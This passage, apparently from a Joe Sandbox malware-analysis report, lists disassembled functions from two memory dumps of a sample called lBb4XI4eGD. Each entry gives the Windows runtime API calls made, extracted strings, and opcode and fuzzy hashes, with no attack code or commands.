                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3803302727-0
                                                                                                                                                                                                                                • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 02152583
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,02150D90), ref: 02152591
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021525A7
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021525B5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 200240550-0
                                                                                                                                                                                                                                • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                • Instruction ID: 13387be15b80b321c315e1842b87d2f45e4b667457405a3be5604b8e4497f359
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE0D8626903296DE710B7754C26FBF369C9B00B45F940861BD24D50C1FFA4D50445A4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 200240550-0
                                                                                                                                                                                                                                • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02152949: TlsAlloc.KERNEL32(?,02150D90), ref: 0215294F
                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,02150D90), ref: 02163BD6
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02163BE8
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02163BFE
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02163C0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3735082963-0
                                                                                                                                                                                                                                • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                • Instruction ID: 55f26d7513f15932ee81301866c3d89c9f1cb1d7d05a425179c10a3e329a7504
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BE0D134440326FFC714BF755C4D67E32586A00B557500DB6ED35D21A0EB35D1154E6D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423981
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3735082963-0
                                                                                                                                                                                                                                • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02150D90), ref: 0215278E
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02150D90), ref: 0215279D
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021527B3
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021527C1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3016159387-0
                                                                                                                                                                                                                                • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                • Instruction ID: d3fb530083e3107c40f79e032f6ec1f84d9aa404793cc9db5efd33340c7fb5b3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BE08075640219EBCB10FFB5DD49EBF73BC6A00705B6004A5AD11E3050DB74D7088B75
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3016159387-0
                                                                                                                                                                                                                                • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 021528E8
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 021528F4
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0215290A
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02152918
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4286982218-0
                                                                                                                                                                                                                                • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                • Instruction ID: 57b22765e9fcdabbed934a236e8e1fcaa2c0638ba7e49b5e61dec2a1d2e5fd3b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE08635140229ABDB14BF61DC09FBF37ACAB00745B500865BD35D10A0EB39D1149A58
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(?,00000000,02157BC8,00000000,?,?,02150D90,?,?,?,00000000,?,00000000), ref: 021529AE
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021529BA
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021529D0
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021529DE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1964976909-0
                                                                                                                                                                                                                                • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                • Instruction ID: 5ed9fd5e0fad208494396e3adbb3308a7375b67ee730b42b1a77fba5556df569
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE08636140139ABDB10BF61DC08BBF376DAF00745B500865BD29E20A0DB35D1148AA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041268D
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4286982218-0
                                                                                                                                                                                                                                • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1964976909-0
                                                                                                                                                                                                                                • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,02150D90), ref: 0215294F
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0215295C
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02152972
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02152980
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3103352999-0
                                                                                                                                                                                                                                • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                • Instruction ID: 260c796830ab00461bc1116a635da75200252f5156f3f32853e8ce40d4b8efae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74E0C231140135AB8724BBB49C48A7F32AC6A01B15BA00A65EC71E20E0EB78E0084AA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004126F5
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3103352999-0
                                                                                                                                                                                                                                • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: s2C$s2C
                                                                                                                                                                                                                                • API String ID: 0-1833909196
                                                                                                                                                                                                                                • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0216895A
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02168A13
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                • Instruction ID: 15328b0d969b4f0142d44d5fc4f1ba1c95bf53d17a5f9469962c01c9ce95163d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6941D630A40209DFCF10DF68C88CABEBBB5BF44328F158165D8156B391C7369929CF91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0217B31B,?,00000050,?,?,?,?,?), ref: 0217B19B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                • Instruction ID: e73a1cf1cc0047baa9bbeed4562ad120a21f2ec9b7304496e2b2280a70902ece
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41214162B99105A6EB249F54ED01BA773BAEBC4B5DF578424E909D7100FB32DB40C394
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                                                                                                                                                                                • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                • String ID: image/png
                                                                                                                                                                                                                                • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                                • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
